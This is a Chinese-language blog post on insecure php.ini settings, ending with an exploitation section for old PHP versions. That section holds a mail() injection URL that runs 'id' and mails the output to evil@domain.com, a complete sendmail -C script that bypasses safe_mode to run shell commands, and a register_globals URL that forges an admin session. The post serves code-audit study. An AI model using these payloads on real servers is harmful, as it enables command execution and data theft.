<!DOCTYPE html>





<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.5.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.4.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.4.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.4.0">
  <link rel="mask-icon" href="/images/logo.svg?v=7.4.0" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.4.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.4.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: 'Kopieren',
      copy_success: 'Kopiert',
      copy_failure: 'Kopieren fehlgeschlagen'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="参考链接http://www.jb51.net/article/5102.htmhttp://blog.csdn.net/fz_flower/article/details/49509159 安全模式本特性已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。 安全模式http://php.net/manual/zh/features.safe-mode.php保护措施和安全模式ht">
<meta name="keywords" content="php">
<meta property="og:type" content="article">
<meta property="og:title" content="php.ini的不安全配置">
<meta property="og:url" content="http://hl0rey.github.io/2018/02/10/php-ini的不安全配置/index.html">
<meta property="og:site_name" content="hl0rey&#39;s blog">
<meta property="og:description" content="参考链接http://www.jb51.net/article/5102.htmhttp://blog.csdn.net/fz_flower/article/details/49509159 安全模式本特性已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。 安全模式http://php.net/manual/zh/features.safe-mode.php保护措施和安全模式ht">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-02-11T02:56:35.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="php.ini的不安全配置">
<meta name="twitter:description" content="参考链接http://www.jb51.net/article/5102.htmhttp://blog.csdn.net/fz_flower/article/details/49509159 安全模式本特性已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。 安全模式http://php.net/manual/zh/features.safe-mode.php保护措施和安全模式ht">
  <link rel="canonical" href="http://hl0rey.github.io/2018/02/10/php-ini的不安全配置/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>php.ini的不安全配置 | hl0rey's blog</title>
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
  <div class="container use-motion">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">hl0rey's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Navigationsleiste an/ausschalten">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
  </ul>

    

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
      <article itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block post">
    <link itemprop="mainEntityOfPage" href="http://hl0rey.github.io/2018/02/10/php-ini的不安全配置/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="博主">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="hl0rey's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">php.ini的不安全配置

          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              
                
              

              <time title="创建于：2018-02-10 21:27:45" itemprop="dateCreated datePublished" datetime="2018-02-10T21:27:45+08:00">2018-02-10</time>
            </span>
          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Bearbeitet am</span>
                <time title="更新于：2018-02-11 10:56:35" itemprop="dateModified" datetime="2018-02-11T10:56:35+08:00">2018-02-11</time>
              </span>
            
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/code/" itemprop="url" rel="index"><span itemprop="name">code</span></a></span>

                
                
              
            </span>
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>参考链接<br><a href="http://www.jb51.net/article/5102.htm" target="_blank" rel="noopener">http://www.jb51.net/article/5102.htm</a><br><a href="http://blog.csdn.net/fz_flower/article/details/49509159" target="_blank" rel="noopener">http://blog.csdn.net/fz_flower/article/details/49509159</a></p>
<h3 id="安全模式"><a href="#安全模式" class="headerlink" title="安全模式"></a>安全模式</h3><pre><code>本特性已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。
</code></pre><p>安全模式<br><a href="http://php.net/manual/zh/features.safe-mode.php" target="_blank" rel="noopener">http://php.net/manual/zh/features.safe-mode.php</a><br>保护措施和安全模式<br><a href="http://php.net/manual/zh/ini.sect.safe-mode.php" target="_blank" rel="noopener">http://php.net/manual/zh/ini.sect.safe-mode.php</a><br>被安全模式限制的函数<br><a href="http://php.net/manual/zh/features.safe-mode.functions.php" target="_blank" rel="noopener">http://php.net/manual/zh/features.safe-mode.functions.php</a></p>
<ul>
<li>safe_mode<br>是否启用 PHP 的安全模式。 </li>
</ul>
<ul>
<li><p>safe_mode_allowed_env<em>vars<br>设置某些环境变量可能是潜在的安全缺口。本指令包含有一个逗号分隔的前缀列表。在安全模式下，用户只能改变那些名字具有在这里提供的前缀的环境变量。默认情况下，用户只能设置以 PHP</em> 开头的环境变量（例如 PHP_FOO = BAR）。</p>
<pre><code>如果本指令为空，PHP 将使用户可以修改任何环境变量！ 
</code></pre></li>
<li><p>safe_mode_exec_dir<br>如果 PHP 使用了安全模式，system() 和其它程序执行函数将拒绝启动不在此目录中的程序。必须使用 / 作为目录分隔符，包括 Windows 中。 </p>
</li>
</ul>
<ul>
<li><p>disable_functions<br>本指令允许你基于安全原因禁止某些函数。接受逗号分隔的函数名列表作为参数。 disable_functions 不受安全模式的影响。 本指令只能设置在 php.ini 中。例如不能将其设置在 httpd.conf。 </p>
</li>
<li><p>com.allow_dcom</p>
<pre><code>自 PHP 4.0.5 起可用
</code></pre></li>
</ul>
<p>如果打开此选项，PHP 将被允许以一个 D-COM（Distributed COM）客户方式操作并允许 PHP 脚本在远程服务器上实例化 COM 对象。</p>
<h3 id="变量控制"><a href="#变量控制" class="headerlink" title="变量控制"></a>变量控制</h3><ul>
<li><p>register_global</p>
<pre><code>在 PHP &lt;= 4.2.3 时是 PHP_INI_ALL。 从 PHP 5.3.0 起不推荐使用。 在 PHP 5.4.0 中移除该选项。    
</code></pre></li>
</ul>
<p>把EGPCS (Environment, GET, POST, Cookie, Server)注册成全局变量．<br>该项不能在脚本中用ini_set()来配置，但是可以用.htaccess来配置，如　php_flag register_globals off. </p>
<ul>
<li><p>magic_quotes_gpc</p>
<pre><code>本特性已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。
</code></pre></li>
</ul>
<p>远近闻名，魔术引号．<br><a href="http://php.net/manual/zh/info.configuration.php#ini.magic-quotes-gpc" target="_blank" rel="noopener">http://php.net/manual/zh/info.configuration.php#ini.magic-quotes-gpc</a></p>
<h3 id="远程文件"><a href="#远程文件" class="headerlink" title="远程文件"></a>远程文件</h3><ul>
<li><p>allow_url_include<br>php.net/manual/zh/filesystem.configuration.php#ini.allow-url-include<br>允许这几个函数（include, include_once, require, require_once）用通过url来包含文件（FTP,HTTP协议）</p>
</li>
<li><p>allow_url_fopen<br><a href="http://php.net/manual/zh/filesystem.configuration.php#ini.allow-url-fopen" target="_blank" rel="noopener">http://php.net/manual/zh/filesystem.configuration.php#ini.allow-url-fopen</a></p>
</li>
</ul>
<h3 id="目录配置"><a href="#目录配置" class="headerlink" title="目录配置"></a>目录配置</h3><ul>
<li><p>expose_php<br>泄漏php版本信息<br>隐藏这个模样的（X-Powered-By: PHP/5.3.7）的相应头．</p>
</li>
<li><p>upload_tmp_dir<br>设置临时目录位置</p>
</li>
<li><p>open_basedir<br><a href="http://php.net/manual/zh/ini.core.php#ini.open-basedir" target="_blank" rel="noopener">http://php.net/manual/zh/ini.core.php#ini.open-basedir</a><br>将 PHP 所能打开的文件限制在指定的目录树，包括文件本身。本指令不受安全模式打开或者关闭的影响。 </p>
</li>
</ul>
<h3 id="错误信息"><a href="#错误信息" class="headerlink" title="错误信息"></a>错误信息</h3><ul>
<li>display_errors<br>是否回显错误，调试的时候打开</li>
<li>error_reporting<br>错误显示级别</li>
</ul>
<h2 id="不安全配置的利用"><a href="#不安全配置的利用" class="headerlink" title="不安全配置的利用"></a>不安全配置的利用</h2><h3 id="safe-mode绕过漏洞"><a href="#safe-mode绕过漏洞" class="headerlink" title="safe_mode绕过漏洞"></a>safe_mode绕过漏洞</h3><p>还有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函数绕过safe_mode限制执行命令漏洞，4.0.5版本开始mail函数增加了第五个参数，由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单，只需用分号隔开后面加shell命令就可以了，比如存在PHP脚本evil.php： </p>
<pre><code>&lt;? mail(&quot;foo@bar,&quot;foo&quot;,&quot;bar&quot;,&quot;&quot;,$bar); ?&gt;  
</code></pre><p>执行如下的URL： </p>
<pre><code>http://foo.com/evil.php?bar=;/usr/bin/id|mail evil@domain.com 
</code></pre><p>这将id执行的结果发送给<br>evil@domain.com </p>
<p>对于4.0.6至4.2.2的PHP突破safe_mode限制其实是利用了sendmail的-C参数，所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令： </p>
<pre><code>&lt;? 
# 注意，下面这两个必须是不存在的，或者它们的属主和本脚本的属主是一样 
$script=&quot;/tmp/script123&quot;; 
$cf=&quot;/tmp/cf123&quot;; 

$fd = fopen($cf, &quot;w&quot;); 
fwrite($fd, &quot;OQ/tmp 
Sparse=0 
R$*&quot; . chr(9) . &quot;$#local $@ $1 $: $1 
Mlocal, P=/bin/sh, A=sh $script&quot;); 
fclose($fd); 

$fd = fopen($script, &quot;w&quot;); 
fwrite($fd, &quot;rm -f $script $cf; &quot;); 
fwrite($fd, $cmd); 
fclose($fd); 

mail(&quot;nobody&quot;, &quot;&quot;, &quot;&quot;, &quot;&quot;, &quot;-C$cf&quot;); 
?&gt; 
</code></pre><p>还是使用以上有问题版本PHP的用户一定要及时升级到最新版本，这样才能消除基本的安全问题。  </p>
<h3 id="全局变量伪造"><a href="#全局变量伪造" class="headerlink" title="全局变量伪造"></a>全局变量伪造</h3><p>test.php</p>
<pre><code>&lt;?php
if($_SESSION[&apos;username&apos;]==&quot;admin&quot;){
    echo &quot;you is admin!&quot;;
}
?&gt;
</code></pre><p>如果register_global模式为On的话，提交：</p>
<pre><code>http://host/test.php?_SESSION[username]=admin
</code></pre><p>就能绕过了．</p>

    </div>

    
    
    
        
      

      <footer class="post-footer">
          
            
          
          <div class="post-tags">
            
              <a href="/tags/php/" rel="tag"># php</a>
            
          </div>
        

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2018/02/10/代码审计大的思路/" rel="next" title="代码审计大的思路">
                  <i class="fa fa-chevron-left"></i> 代码审计大的思路
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/2018/02/11/代码审计之SQL注入/" rel="prev" title="代码审计之SQL注入">
                  代码审计之SQL注入 <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#安全模式"><span class="nav-number">1.</span> <span class="nav-text">安全模式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#变量控制"><span class="nav-number">2.</span> <span class="nav-text">变量控制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#远程文件"><span class="nav-number">3.</span> <span class="nav-text">远程文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#目录配置"><span class="nav-number">4.</span> <span class="nav-text">目录配置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#错误信息"><span class="nav-number">5.</span> <span class="nav-text">错误信息</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#不安全配置的利用"><span class="nav-number"></span> <span class="nav-text">不安全配置的利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#safe-mode绕过漏洞"><span class="nav-number">1.</span> <span class="nav-text">safe_mode绕过漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#全局变量伪造"><span class="nav-number">2.</span> <span class="nav-text">全局变量伪造</span></a></li></ol></div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">博主</p>
  <div class="site-description" itemprop="description"></div>
</div>
  <nav class="site-state motion-element">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-tags">
        
          
            <a href="/tags/">
          
        
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span>
        </a>
      </div>
    
  </nav>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">博主</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.5.0</div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.4.0</div>

        












        
      </div>
    </footer>
  </div>

  


  <script src="/lib/anime.min.js?v=3.1.0"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.4.0"></script><script src="/js/motion.js?v=7.4.0"></script>
<script src="/js/schemes/muse.js?v=7.4.0"></script>
<script src="/js/next-boot.js?v=7.4.0"></script>



  





















  

  

  

</body>
</html>
